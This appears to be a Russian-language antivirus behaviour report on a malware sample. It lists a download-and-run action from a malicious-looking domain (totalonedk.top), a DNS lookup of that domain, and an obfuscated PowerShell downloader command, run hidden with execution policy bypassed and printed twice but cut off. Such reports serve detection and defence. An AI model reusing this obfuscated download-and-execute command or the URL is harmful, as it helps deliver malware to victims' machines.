Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://totalonedk.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "p^o^wERS^He^lL^.EXe -^eX^e^cu^tIO^NP^OLI^Cy^ BYPa^sS^ ^-n^o^P^R^of^i^l^E^ -WInDO^W^s^T^Y^Le^ hiD^dEN (NeW-Obj^eC^T ^sy^S^T^EM^.net.^w^EbCliENt).dOw^nl^oadFil^e^('http://to...
Сетевая активность
UDP
- DNS ASK to###onedk.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "p^o^wERS^He^lL^.EXe -^eX^e^cu^tIO^NP^OLI^Cy^ BYPa^sS^ ^-n^o^P^R^of^i^l^E^ -WInDO^W^s^T^Y^Le^ hiD^dEN (NeW-Obj^eC^T ^sy^S^T^EM^.net.^w^EbCliENt).dOw^nl^oadFil^e^('http://to...' (со скрытым окном)
